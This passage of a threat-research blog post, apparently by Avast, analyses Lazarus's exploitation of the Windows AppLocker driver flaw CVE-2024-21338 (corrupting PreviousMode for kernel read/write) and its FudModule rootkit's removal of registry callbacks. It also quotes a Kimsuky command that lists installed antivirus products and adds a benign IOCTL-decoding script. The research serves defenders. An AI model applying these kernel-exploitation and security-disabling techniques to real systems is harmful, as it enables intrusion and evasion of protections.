href="https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5" target="_blank" rel="noreferrer noopener">hw.sys</a> for the final privilege escalation stage of their browser exploit chain.&nbsp;</p>
  2375.  
  2376.  
  2377.  
  2378. <h6 class="wp-block-heading"><strong>Beyond BYOVD</strong>&nbsp;</h6>
  2379.  
  2380.  
  2381.  
  2382. <p>Finally, the holy grail of admin-to-kernel is going beyond BYOVD by exploiting a zero-day in a driver that’s known to be already installed on the target machine. To make the attack as universal as possible, the most obvious target here would be a built-in Windows driver that’s already a part of the operating system.&nbsp;&nbsp;</p>
  2383.  
  2384.  
  2385.  
  2386. <p>Discovering an exploitable vulnerability in such a driver is significantly more challenging than in the previous BYOVD scenarios for two reasons. First, the number of possible target drivers is vastly smaller, resulting in a much-reduced attack surface. Second, the code quality of built-in drivers is arguably higher than that of random third-party drivers, making vulnerabilities much more difficult to find. It’s also worth noting that &#8211; while patching tends to be ineffective at stopping BYOVD attacks (even if a vendor patches their driver, the attacker can still abuse the older, unpatched version of the driver) &#8211; patching a built-in driver will make the vulnerability no longer usable for this kind of zero-day attack.&nbsp;</p>
  2387.  
  2388.  
  2389.  
  2390. <p>If an attacker, despite all of these hurdles, manages to exploit a zero-day vulnerability in a built-in driver, they will be rewarded with a level of stealth that cannot be matched by standard BYOVD exploitation. By exploiting such a vulnerability, the attacker is in a sense <a href="https://www.crowdstrike.com/cybersecurity-101/living-off-the-land-attacks-lotl/" target="_blank" rel="noreferrer noopener">living off the land</a> with no need to bring, drop, or load any custom drivers, making it possible for a kernel attack to be truly fileless. This not only evades most detection mechanisms but also enables the attack on systems where driver allowlisting is in place (which might seem a bit ironic, given that CVE-2024-21338 concerns an AppLocker driver).&nbsp;&nbsp;</p>
  2391.  
  2392.  
  2393.  
  2394. <p>While we can only speculate on Lazarus’ motivation for choosing this third approach for crossing the admin-to-kernel boundary, we believe that stealth was their primary motivation. Given their level of notoriety, they would have to swap vulnerabilities any time someone burned their currently used BYOVD technique. Perhaps they also reasoned that, by going beyond BYOVD, they could minimize the need for swapping by staying undetected for longer.&nbsp;</p>
  2395.  
  2396.  
  2397.  
  2398. <h2 class="wp-block-heading">CVE-2024-21338&nbsp;</h2>
  2399.  
  2400.  
  2401.  
  2402. <p>As far as zero-days go, CVE-2024-21338 is relatively straightforward to both understand and exploit. The vulnerability resides within the IOCTL (Input and Output Control) dispatcher in <code>appid.sys</code>, which is the central driver behind <a href="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/applocker-overview" target="_blank" rel="noreferrer noopener">AppLocker</a>, the application whitelisting <a href="https://www.tiraniddo.dev/2019/11/the-internals-of-applocker-part-1.html" target="_blank" rel="noreferrer noopener">technology</a> built into Windows. The vulnerable control code <code>0x22A018</code> is designed to compute a <em>smart hash</em> of an executable image file. This IOCTL offers some flexibility by allowing the caller to specify how the driver should query and read the hashed file. The problem is, this flexibility is achieved by expecting two kernel function pointers referenced from the IOCTL’s input buffer: one containing a callback pointer to query the hashed file’s size and the other a callback pointer to read the data to be hashed.&nbsp;&nbsp;</p>
  2403.  
  2404.  
  2405.  
  2406. <p>Since user mode would typically not be handling kernel function pointers, this design suggests the IOCTL may have been initially designed to be invoked from the kernel. Indeed, while we did not find any legitimate user-mode callers, the IOCTL does get invoked by other AppLocker drivers. For instance, there is a <code>ZwDeviceIoControlFile</code> call in <code>applockerfltr.sys</code>, passing <code>SmpQueryFile</code> and <code>SmpReadFile</code> for the callback pointers. Aside from that, <code>appid.sys</code> itself also uses this functionality, passing <code>AipQueryFileHandle</code> and <code>AipReadFileHandle</code> (which are basically just wrappers over <code>ZwQueryInformationFile</code> and <code>ZwReadFile</code>, respectively).&nbsp;</p>
  2407.  
  2408.  
  2409.  
  2410. <p>Despite this design, the vulnerable IOCTL remained accessible from user space, meaning that a user-space attacker could abuse it to essentially trick the kernel into calling an arbitrary pointer. What’s more, the attacker also partially controlled the data referenced by the first argument passed to the invoked callback function. This presented an ideal exploitation scenario, allowing the attacker to call an arbitrary kernel function with a high degree of control over the first argument.&nbsp;</p>
  2411.  
  2412.  
  2413. <div class="wp-block-image">
  2414. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="390" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vuln_triggered-1024x390.png" alt="" class="wp-image-8197" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vuln_triggered-1024x390.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vuln_triggered-300x114.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vuln_triggered-768x292.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vuln_triggered.png 1172w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">A WinDbg session with the triggered vulnerability, traced to the arbitrary callback invocation. Note that the attacker controls both the function pointer to be called (<code>0xdeadbeefdeadbeef</code> in this session) and the data pointed to by the first argument (<code>0xbaadf00dbaadf00d</code>).&nbsp;</figcaption></figure></div>
  2415.  
  2416.  
  2417. <p>If exploitation sounds trivial, note that there are some constraints on what pointers this vulnerability allows an attacker to call. Of course, in the presence of <a href="https://j00ru.vexillium.org/2011/06/smep-what-is-it-and-how-to-beat-it-on-windows/" target="_blank" rel="noreferrer noopener">SMEP</a> (Supervisor Mode Execution Prevention), the attacker cannot just supply a user-mode shellcode pointer. What’s more, the callback invocation is an indirect call that may be safeguarded by <a href="https://learn.microsoft.com/en-us/windows/win32/secbp/control-flow-guard" target="_blank" rel="noreferrer noopener">kCFG</a> (Kernel Control Flow Guard), requiring that the supplied kernel pointers represent valid kCFG call targets. In practice, this does not prevent exploitation, as the attacker can just find some kCFG-compliant gadget function that would turn this into another primitive, such as a (limited) read/write. There are also a few other constraints on the IOCTL input buffer that must be solved in order to reach the vulnerable callback invocation. However, these too are relatively straightforward to satisfy, as the attacker only needs to fake some kernel objects and supply the right values so that the IOCTL handler passes all the necessary checks while at the same time not crashing the kernel.&nbsp;</p>
  2418.  
  2419.  
  2420.  
  2421. <p>The vulnerable IOCTL is exposed through a device object named <code>\Device\AppId</code>. <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/defining-i-o-control-codes" target="_blank" rel="noreferrer noopener">Breaking down</a> the <code>0x22A018</code> control code and extracting the <code>RequiredAccess</code> field reveals that a handle with write access is required to call it. Inspecting the device’s ACL (Access Control List; see the screenshot below), there are entries for <code>local service</code>, <code>administrators</code>, and <code>appidsvc</code>. While the entry for <code>administrators</code> does not grant write access, the entry for <code>local service</code> does. Therefore, to describe CVE-2024-21338 more accurately, we should label it <em>local service-to-kernel</em> rather than <em>admin-to-kernel</em>. It’s also noteworthy that <code>appid.sys</code> might create two additional device objects, namely <code>\Device\AppidEDPPlugin</code> and <code>\Device\SrpDevice</code>. Although these come with more permissive ACLs, the vulnerable IOCTL handler is unreachable through them, rendering them irrelevant for exploitation purposes.&nbsp;</p>
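One way to perform that breakdown yourself is the added Python decoder below (example code, not from the post or from <code>appid.sys</code>); it follows the CTL_CODE bit layout in Microsoft's documentation, with constant names taken from the public wdm.h header.

```python
"""Decode a Windows I/O control code into the fields packed by CTL_CODE.

Added example, not code from the post or from appid.sys. Bit layout per
Microsoft's "Defining I/O Control Codes": DeviceType in bits 31..16,
RequiredAccess in bits 15..14, Function in bits 13..2, TransferType in bits 1..0.
"""
from dataclasses import dataclass

# Public constants from wdm.h / ntddk.h.
FILE_DEVICE_UNKNOWN = 0x22

FILE_ANY_ACCESS = 0x0
FILE_READ_ACCESS = 0x1
FILE_WRITE_ACCESS = 0x2

METHOD_BUFFERED = 0
METHOD_IN_DIRECT = 1
METHOD_OUT_DIRECT = 2
METHOD_NEITHER = 3

_ACCESS_NAMES = {
    FILE_ANY_ACCESS: "FILE_ANY_ACCESS",
    FILE_READ_ACCESS: "FILE_READ_ACCESS",
    FILE_WRITE_ACCESS: "FILE_WRITE_ACCESS",
    FILE_READ_ACCESS | FILE_WRITE_ACCESS: "FILE_READ_ACCESS | FILE_WRITE_ACCESS",
}
_METHOD_NAMES = {
    METHOD_BUFFERED: "METHOD_BUFFERED",
    METHOD_IN_DIRECT: "METHOD_IN_DIRECT",
    METHOD_OUT_DIRECT: "METHOD_OUT_DIRECT",
    METHOD_NEITHER: "METHOD_NEITHER",
}


@dataclass(frozen=True)
class IoctlCode:
    device_type: int
    required_access: int
    function: int
    method: int

    @property
    def access_name(self) -> str:
        return _ACCESS_NAMES[self.required_access]

    @property
    def method_name(self) -> str:
        return _METHOD_NAMES[self.method]

    def needs_write_handle(self) -> bool:
        # The I/O manager only delivers the request if the caller's handle
        # was opened with the access rights named in RequiredAccess.
        return bool(self.required_access & FILE_WRITE_ACCESS)

    def is_vendor_function(self) -> bool:
        # Function values below 0x800 are reserved for Microsoft; 0x800 and
        # up are the range handed to driver vendors.
        return self.function >= 0x800


def decode_ioctl(code: int) -> IoctlCode:
    """Split a 32-bit control code into its four fields."""
    if not 0 <= code <= 0xFFFFFFFF:
        raise ValueError(f"control code out of range: {code:#x}")
    return IoctlCode(
        device_type=(code >> 16) & 0xFFFF,
        required_access=(code >> 14) & 0x3,
        function=(code >> 2) & 0xFFF,
        method=code & 0x3,
    )


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Mirror of the CTL_CODE macro, used to round-trip a decoded code."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def describe(code: int) -> str:
    """One-line summary of a control code, as an analyst would note it."""
    c = decode_ioctl(code)
    handle = "write handle required" if c.needs_write_handle() else "no write access required"
    return (
        f"{code:#010x}: DeviceType={c.device_type:#x} Function={c.function:#x} "
        f"{c.method_name} {c.access_name} ({handle})"
    )


if __name__ == "__main__":
    # The vulnerable AppId control code discussed in the post.
    print(describe(0x22A018))
```

For <code>0x22A018</code> the decoder yields DeviceType <code>FILE_DEVICE_UNKNOWN</code>, function <code>0x806</code>, <code>METHOD_BUFFERED</code> and <code>FILE_WRITE_ACCESS</code>, which is why a write handle to <code>\Device\AppId</code> is needed.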
  2422.  
  2423.  
  2424. <div class="wp-block-image">
  2425. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1019" height="476" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/appid_device_acl.png" alt="" class="wp-image-8198" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/appid_device_acl.png 1019w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/appid_device_acl-300x140.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/appid_device_acl-768x359.png 768w" sizes="(max-width: 1019px) 100vw, 1019px" /><figcaption class="wp-element-caption">Access control entries of <code>\Device\AppId</code>, revealing that while <code>local service</code> is allowed write access, <code>administrators</code> are not.&nbsp;</figcaption></figure></div>
  2426.  
  2427.  
  2428. <p>As the <a href="https://learn.microsoft.com/en-us/windows/win32/services/localservice-account" target="_blank" rel="noreferrer noopener">local service</a> account has reduced privileges compared to administrators, this also gives the vulnerability a somewhat higher impact than standard admin-to-kernel. This might be the reason Microsoft characterized the CVE as <code>Privileges Required: Low</code>, taking into account that <code>local service</code> processes do not necessarily run at higher integrity levels. However, for the purposes of this blog, we still chose to refer to CVE-2024-21338 mainly as an admin-to-kernel vulnerability because we find it better reflects how it was used in the wild – Lazarus was already running with elevated privileges and then impersonated the local service account just prior to calling the IOCTL.&nbsp;</p>
  2429.  
  2430.  
  2431.  
  2432. <p>The vulnerability was introduced in Win10 1703 (RS2/15063) when the <code>0x22A018</code> IOCTL handler was first implemented. Older builds are not affected as they lack support for the vulnerable IOCTL. Interestingly, the Lazarus exploit bails out if it encounters a build older than Win10 1809 (RS5/17763), completely disregarding three perfectly vulnerable Windows versions. As for the later versions, the vulnerability extended all the way up to the most recent builds, including Win11 23H2. There have been some slight changes to the IOCTL, including an extra argument expected in the input buffer, but nothing that would prevent exploitation.&nbsp;&nbsp;</p>
  2433.  
  2434.  
  2435.  
  2436. <p>We developed a custom PoC (Proof of Concept) exploit and submitted it in August 2023 as part of a vulnerability report to Microsoft, leading to an advisory for <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338" target="_blank" rel="noreferrer noopener">CVE-2024-21338</a> in the February Patch Tuesday update. The update addressed the vulnerability by adding an <code>ExGetPreviousMode</code> check to the IOCTL handler (see the patch below). This aims to prevent user-mode initiated IOCTLs from triggering the arbitrary callbacks.&nbsp;</p>
  2437.  
  2438.  
  2439. <div class="wp-block-image">
  2440. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="332" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/patch_diaphora-1-1024x332.png" alt="" class="wp-image-8199" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/patch_diaphora-1-1024x332.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/patch_diaphora-1-300x97.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/patch_diaphora-1-768x249.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/patch_diaphora-1.png 1260w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">The patched IOCTL handler. If feature <code>2959575357</code> is enabled, attempts to call the IOCTL with <code>PreviousMode==UserMode</code> should immediately result in <code>STATUS_INVALID_DEVICE_REQUEST</code>, failing to even reach <code>AipSmartHashImageFile</code>.&nbsp;</figcaption></figure></div>
  2441.  
  2442.  
  2443. <p>Though the vulnerability may only barely meet Microsoft’s security servicing criteria, we believe patching was the right choice and would like to thank Microsoft for eventually addressing this issue. Patching will undoubtedly disrupt Lazarus’ offensive operations, forcing them to either find a new admin-to-kernel zero-day or revert to using BYOVD techniques. While discovering an admin-to-kernel zero-day may not be as challenging as discovering a zero-day in a more attractive attack surface (such as standard user-to-kernel, or even sandbox-to-kernel), we believe that finding one would still require Lazarus to invest significant resources, potentially diverting their focus from attacking some other unfortunate targets.&nbsp;</p>
  2444.  
  2445.  
  2446.  
  2447. <h4 class="wp-block-heading">Exploitation&nbsp;</h4>
  2448.  
  2449.  
  2450.  
  2451. <p>The Lazarus exploit begins with an initialization stage, which performs a one-time setup for both the exploit and the rootkit (both have been compiled into the same module). This initialization starts by dynamically resolving all necessary Windows API functions, followed by a low-effort anti-debug check on <code>PEB.BeingDebugged</code>. Then, the exploit inspects the build number to see if it’s running on a supported Windows version. If so, it loads hardcoded constants tailored to the current build. Interestingly, the choice of constants sometimes comes down to the update build revision (UBR), showcasing a high degree of dedication towards ensuring that the code runs cleanly across a wide range of target machines.&nbsp;&nbsp;</p>
  2452.  
  2453.  
  2454. <div class="wp-block-image">
  2455. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="763" height="482" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/offsets.png" alt="" class="wp-image-8201" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/offsets.png 763w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/offsets-300x190.png 300w" sizes="(max-width: 763px) 100vw, 763px" /><figcaption class="wp-element-caption">A decompiled code snippet, loading version-specific hardcoded constants. This particular example contains offsets and syscall numbers for Win10 1809.&nbsp;</figcaption></figure></div>
  2456.  
  2457.  
  2458. <p>The initialization process then continues with leaking the base addresses of three kernel modules: <code>ntoskrnl</code>, <code>netio</code>, and <code>fltmgr</code>. This is achieved by calling <code>NtQuerySystemInformation</code> using the <code>SystemModuleInformation</code> class. The <code>KTHREAD</code> address of the currently executing thread is also leaked in a similar fashion, by duplicating the current thread pseudohandle and then finding the corresponding kernel object address using the <code>SystemExtendedHandleInformation</code> system information class. Finally, the exploit manually loads the <code>ntoskrnl</code> image into the user address space, only to scan for relative virtual addresses (RVAs) of some functions of interest.&nbsp;</p>
  2459.  
  2460.  
  2461.  
  2462. <p>Since the <code>appid.sys</code> driver does not have to be already loaded on the target machine, the exploit may first have to load it itself. It chooses to accomplish this in an indirect way, by writing an event to one specific AppLocker-related ETW (Event Tracing for Windows) provider. Once <code>appid.sys</code> is loaded, the exploit impersonates the <code>local service</code> account using a direct syscall to <code>NtSetInformationThread</code> with the <code>ThreadImpersonationToken</code> thread information class. By impersonating <code>local service</code>, it can now obtain a read/write handle to <code>\Device\AppId</code>. With this handle, the exploit finally prepares the IOCTL input buffer and triggers the vulnerability using the <code>NtDeviceIoControlFile</code> syscall.&nbsp;&nbsp;</p>
  2463.  
  2464.  
  2465. <div class="wp-block-image">
  2466. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="511" height="913" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/direct_syscall.png" alt="" class="wp-image-8202" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/direct_syscall.png 511w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/direct_syscall-168x300.png 168w" sizes="(max-width: 511px) 100vw, 511px" /><figcaption class="wp-element-caption">Direct syscalls are heavily used throughout the exploit.&nbsp;</figcaption></figure></div>
  2467.  
  2468.  
  2469. <p>The exploit crafts the IOCTL input buffer in such a way that the vulnerable callback is essentially a gadget that performs a 64-bit copy from the IOCTL input buffer to an arbitrary target address. This address was chosen to corrupt the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/previousmode" target="_blank" rel="noreferrer noopener">PreviousMode</a> of the current thread. By ensuring the corresponding source byte in the IOCTL input buffer is zero, the copy will clear the <code>PreviousMode</code> field, effectively resulting in its value being interpreted as <code>KernelMode</code>. Targeting <code>PreviousMode</code> like this is a widely popular <a href="https://research.nccgroup.com/2020/05/25/cve-2018-8611-exploiting-windows-ktm-part-5-5-vulnerability-detection-and-a-better-read-write-primitive/#previousmode-abuse:~:text=into%20PreviousMode%20further.-,PreviousMode%20%E2%80%93%20a%20%22god%20mode%22%20primitive%3F,-PreviousMode%20on%2064" target="_blank" rel="noreferrer noopener">exploitation technique</a>, as corrupting this one byte in the <code>KTHREAD</code> structure bypasses kernel-mode checks inside syscalls such as <code>NtReadVirtualMemory</code> or <code>NtWriteVirtualMemory</code>, allowing a user-mode attacker to read and write arbitrary kernel memory. Note that while this technique was <a href="https://x.com/GabrielLandau/status/1597001955909697536" target="_blank" rel="noreferrer noopener">mitigated</a> on some Windows Insider Builds, this mitigation has yet to reach general availability at the time of writing.&nbsp;</p>
  2470.  
  2471.  
  2472.  
  2473. <p>Interestingly, the exploit may attempt to trigger the vulnerable IOCTL twice. This is due to an extra argument that was added in Win11 22H2. As a result, the IOCTL handler on newer builds expects the input buffer to be <code>0x20</code> bytes in size while, previously, the expected size was only <code>0x18</code>. Rather than selecting the proper input buffer size for the current build, the exploit just tries calling the IOCTL twice: first with an input buffer size <code>0x18</code> then – if not successful – with <code>0x20</code>. This is a valid approach since the IOCTL handler’s first action is to check the input buffer size, and if it doesn’t match the expected size, it would just immediately return <code>STATUS_INVALID_PARAMETER</code>.&nbsp;&nbsp;</p>
  2474.  
  2475.  
  2476.  
  2477. <p>To check if it was successful, the exploit employs the <code>NtWriteVirtualMemory</code> syscall, attempting to read the current thread’s <code>PreviousMode</code> (Lazarus avoids using <code>NtReadVirtualMemory</code>, more on this later). If the exploit succeeded, the syscall should return <code>STATUS_SUCCESS</code>, and the leaked <code>PreviousMode</code> byte should equal <code>0</code> (meaning <code>KernelMode</code>). Otherwise, the syscall should return an error status code, as it should be impossible to read kernel memory without a corrupted <code>PreviousMode</code>.&nbsp;&nbsp;</p>
  2478.  
  2479.  
  2480.  
  2481. <p>In our exploit analysis, we deliberately chose to omit some key details, such as the choice of the callback gadget function. This decision was made to strike the right balance between helping defenders with detection but not making exploitation too widely accessible. For those requiring more information for defensive purposes, we may be able to share additional details on a case-by-case basis.&nbsp;</p>
  2482.  
  2483.  
  2484.  
  2485. <h2 class="wp-block-heading">The FudModule Rootkit</h2>
  2486.  
  2487.  
  2488.  
  2489. <p>The entire goal of the admin-to-kernel exploit was to corrupt the current thread’s <code>PreviousMode</code>. This allows for a powerful kernel read/write primitive, where the affected user-mode thread can read and write arbitrary kernel memory using the <code>Nt(Read|Write)VirtualMemory</code> syscalls. Armed with this primitive, the FudModule rootkit employs direct kernel object manipulation (DKOM) techniques to disrupt various kernel security mechanisms. It&#8217;s worth reiterating that FudModule is a data-only rootkit, meaning it executes entirely from user space and all the kernel tampering is performed through the read/write primitive.&nbsp;&nbsp;</p>
  2490.  
  2491.  
  2492.  
  2493. <p>The first variants of the FudModule rootkit were independently discovered by AhnLab and ESET research teams, with both publishing detailed analyses in September 2022. The rootkit was named after the <code>FudModule.dll</code> string used as the name in its export table. While this artifact is not present anymore, there is no doubt that what we found is an updated version of the same rootkit. AhnLab’s <a href="https://download.ahnlab.com/global/brochure/Analysis-Report-on-Lazarus-Groups-Rootkit-Attack-Using-BYOVD.pdf" target="_blank" rel="noreferrer noopener">report</a> documented a sample from early 2022, which incorporated seven data-only rootkit techniques and was enabled through a BYOVD exploit for <a href="https://www.virustotal.com/gui/file/175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347" target="_blank" rel="noreferrer noopener">ene.sys</a>. ESET’s <a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf" target="_blank" rel="noreferrer noopener">report</a> examined a slightly earlier variant from late 2021, also featuring seven rootkit techniques but exploiting a different BYOVD vulnerability in <a href="https://www.virustotal.com/gui/file/0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5/detection" target="_blank" rel="noreferrer noopener">dbutil_2_3.sys</a>. In contrast, our discovery concerns a sample featuring nine rootkit techniques and exploiting a previously unknown admin-to-kernel vulnerability. Out of these nine techniques, four are new, three are improved, and two remain unchanged from the previous variants. This leaves two of the original seven techniques, which have been deprecated and are no longer present in the latest variant.&nbsp;</p>
  2494.  
  2495.  
  2496.  
  2497. <p>Each rootkit technique is assigned a bit, ranging from <code>0x1</code> to <code>0x200</code> (the <code>0x20</code> bit is left unused in the current variant). FudModule executes the techniques sequentially, in an ascending order of the assigned bits. The bits are used to report on the success of the individual techniques. During execution, FudModule will construct an integer value (named <code>bitfield_techniques</code> in the decompilation below), where only the bits corresponding to successfully executed techniques will be set. This integer is ultimately written to a file named <code>tem1245.tmp</code>, reporting on the rootkit’s success. Interestingly, we did not find this filename referenced in any other Lazarus sample, suggesting the dropped file is only inspected through hands-on-keyboard activity, presumably through a RAT (Remote Access Trojan) command. This supports our belief that FudModule is only loosely integrated into the rest of Lazarus’ malware ecosystem and that Lazarus is very careful about using the rootkit, only deploying it on demand under the right circumstances.&nbsp;</p>
  2498.  
  2499.  
  2500. <div class="wp-block-image">
  2501. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="779" height="704" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/rootkit_main.png" alt="" class="wp-image-8203" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/rootkit_main.png 779w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/rootkit_main-300x271.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/rootkit_main-768x694.png 768w" sizes="(max-width: 779px) 100vw, 779px" /><figcaption class="wp-element-caption">The rootkit’s &#8220;main&#8221; function, executing the individual rootkit techniques. Note the missing <code>0x20</code> technique.&nbsp;</figcaption></figure></div>
  2502.  
  2503.  
  2504. <p>Based on the large number of updates, it seems that FudModule remains under active development. The latest variant appears more robust, avoiding some potentially problematic practices from the earlier variants. Since some techniques target undocumented kernel internals in a way that we have not previously encountered, we believe that Lazarus must be conducting their own kernel research. Further, though the rootkit is certainly technically sophisticated, we still identified a few bugs here and there. These may either limit the rootkit’s intended functionality or even cause kernel bug checks under the right conditions. While we find some of these bugs very interesting and would love to share the details, we do not enjoy the idea of providing free bug reports to threat actors, so we will hold onto them for now and potentially share some information later if the bugs get fixed.&nbsp;</p>
  2505.  
  2506.  
  2507.  
  2508. <p>Interestingly, FudModule utilizes the <code>NtWriteVirtualMemory</code> syscall for both reading and writing kernel memory, eliminating the need to call <code>NtReadVirtualMemory</code>. This leverages the property that, when limited to a single virtual address space, <code>NtReadVirtualMemory</code> and <code>NtWriteVirtualMemory</code> are basically inverse operations with respect to the values of the source <code>Buffer</code> and the destination <code>BaseAddress</code> <a href="http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtWriteVirtualMemory.html" target="_blank" rel="noreferrer noopener">arguments</a>. In other words, writing to kernel memory can be thought of as writing from a user-mode <code>Buffer</code> to a kernel-mode <code>BaseAddress</code>, while reading from kernel memory could be conversely achieved by swapping arguments, that is, writing from a kernel-mode <code>Buffer</code> to a user-mode <code>BaseAddress</code>. Lazarus’ implementation takes advantage of this, which seems to be an intentional design decision since most developers would likely prefer the more straightforward way of using <code>NtReadVirtualMemory</code> for reading kernel memory and <code>NtWriteVirtualMemory</code> for writing kernel memory. We can only guess why Lazarus chose this approach, but this might be yet another stealth-enhancing feature. With their implementation, they only have to use one suspicious syscall instead of two, potentially reducing the number of detection opportunities.&nbsp;</p>
  2509.  
  2510.  
  2511.  
  2512. <h6 class="wp-block-heading"><strong>Debug Prints</strong>&nbsp;</h6>
  2513.  
  2514.  
  2515.  
  2516. <p>Before we delve into the actual rootkit techniques, there is one last thing worth discussing. To our initial surprise, Lazarus left a handful of plaintext debug prints in the compiled code. Such prints are typically one of the best things that can happen to a malware researcher, because they tend to accelerate the reverse engineering process significantly. In this instance, however, some of the prints had the opposite effect, sometimes even making us question if we understood the code correctly.&nbsp;&nbsp;</p>
  2517.  
  2518.  
  2519.  
  2520. <p>As an example, let us mention the string <code>get rop function addresses failed</code>. Assuming <em>rop</em> stands for <em>return-oriented programming</em>, this string would make perfect sense in the context of exploitation, if not for the fact that not a single return address was corrupted in the exploit.&nbsp;&nbsp;</p>
  2521.  
  2522.  
  2523. <div class="wp-block-image">
  2524. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="984" height="148" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vaccines.png" alt="" class="wp-image-8204" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vaccines.png 984w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vaccines-300x45.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/vaccines-768x116.png 768w" sizes="(max-width: 984px) 100vw, 984px" /><figcaption class="wp-element-caption">Plaintext debug strings found in the rootkit. The term <em>vaccine</em> is used to refer to security software.&nbsp;</figcaption></figure></div>
  2525.  
  2526.  
  2527. <p>While written in English, the debug strings suggest their authors are not native speakers, occasionally even pointing to their supposed Korean origin. This is best seen in the frequent usage of the term <em>vaccine</em> throughout the rootkit. This had us scratching our heads at first, because it was unclear how vaccines would relate to the rootkit functionality. However, it soon became apparent that the term was used to <a href="https://medium.com/s2wblog/detailed-analysis-of-darkgate-investigating-new-top-trend-backdoor-malware-0545ecf5f606#:~:text=use%20are%20different.-,Vaccine%20Detection,-DarkGate%20detects%20installed" target="_blank" rel="noreferrer noopener">refer</a> to security software. This might originate from a common Korean <a href="https://translate.google.com/?sl=en&amp;tl=ko&amp;text=antivirus&amp;op=translate" target="_blank" rel="noreferrer noopener">translation</a> of <em>antivirus</em> (바이러스 백신), a compound word with the literal meaning <em>virus vaccine</em>. Note that even North Korea’s “own” antivirus was called <a href="https://research.checkpoint.com/2018/silivaccine-a-look-inside-north-koreas-anti-virus/" target="_blank" rel="noreferrer noopener">SiliVaccine</a>, and to the best of our knowledge, the term <em>vaccine</em> would not be used like this in other languages such as Japanese. Additionally, this is not the first time Korean-speaking threat actors have used this term. For instance, AhnLab’s recent <a href="https://asec.ahnlab.com/en/59387/" target="_blank" rel="noreferrer noopener">report</a> on Kimsuky mentions the following telltale command:&nbsp;<br>&nbsp;<br><code>cmd.exe /U /c wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname &gt; vaccine.txt</code></p>
  2528.  
  2529.  
  2530.  
  2531. <p>Another puzzle is the abbreviation <code>pvmode</code>, which we believe refers to <code>PreviousMode</code>. A Google search for <code>pvmode</code> yields exactly zero relevant results, and we suspect most English speakers would choose different abbreviations, such as <code>prvmode</code> or <code>prevmode</code>. However, after consulting language experts, we learned that using the abbreviation <code>pvmode</code> would be unusual for Korean speakers too.&nbsp;</p>
  2532.  
  2533.  
  2534.  
  2535. <p>Finally, there is also the debug message <code>disableV3Protection passed</code>. Judging from the context, the rather generic term <em>V3</em> here refers to <em>AhnLab V3 Endpoint Security</em>. Considering the geopolitical situation, North Korean hacker groups are likely well-acquainted with South Korean AhnLab, so it would make perfect sense that they internally refer to them using such a non-specific shorthand.&nbsp;</p>
  2536.  
  2537.  
  2538.  
  2539. <h4 class="wp-block-heading" id="techniques">0x01 &#8211; Registry Callbacks&nbsp;</h4>
  2540.  
  2541.  
  2542.  
  2543. <p>The first rootkit technique is designed to address <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/filtering-registry-calls" target="_blank" rel="noreferrer noopener">registry callbacks.</a> This is a documented Windows mechanism which allows security solutions to monitor registry operations. A security solution’s kernel-mode component can call the <code>CmRegisterCallbackEx</code> routine to register a callback, which gets notified whenever a registry operation is performed on the system. What’s more, since the callback is invoked synchronously, before (or after) the actual operation is performed, the callback can even block or modify forbidden/malicious operations. FudModule’s goal here is to remove existing registry callbacks and thus disrupt security solutions that rely on this mechanism.&nbsp;</p>
  2544.  
  2545.  
  2546.  
